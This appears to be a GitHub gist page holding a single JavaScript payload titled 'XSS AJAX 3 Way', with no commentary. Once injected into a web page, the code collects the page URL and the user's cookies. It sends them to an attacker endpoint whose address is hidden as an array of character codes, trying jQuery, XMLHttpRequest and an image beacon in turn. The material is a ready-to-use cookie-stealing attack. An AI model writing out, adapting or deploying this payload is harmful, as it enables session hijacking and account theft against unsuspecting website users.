Skip to content

Instantly share code, notes, and snippets.

@ndunks ndunks/xss-ajax.js
Created Jan 29, 2019

Embed
What would you like to do?
XSS AJAX 3 Way
(function(w,d,u){
if(w['$'] && w['$'].post){
$.post(u,{u: d.location.href, c: d.cookie});
}else{
var fu = [u,'\x3f','u=',escape(d.location.href),'&c=',escape(d.cookie)].join('');
console.log('FU: ', fu);
function planB(){
el = d.createElement('img');
el.onerror = el.onload = function(){ el.remove() }
el.src=fu; d.body.append(el);
}
if(w['XMLHttpRequest']){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == XMLHttpRequest.DONE && xmlhttp.status != 200) {
planB();
}
};
xmlhttp.open('GET',fu,true);
xmlhttp.send();
}else{
planB();
}
}
})(window,document,[104,116,116,112,115,58,47,47,112,108,97,121,115,116,111,114,101,45,97,112,105,46,99,111,109,47,75,67,47,120,46,112,104,112]
.map(function(v,i,a){return String.fromCharCode(v)}).join(''))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.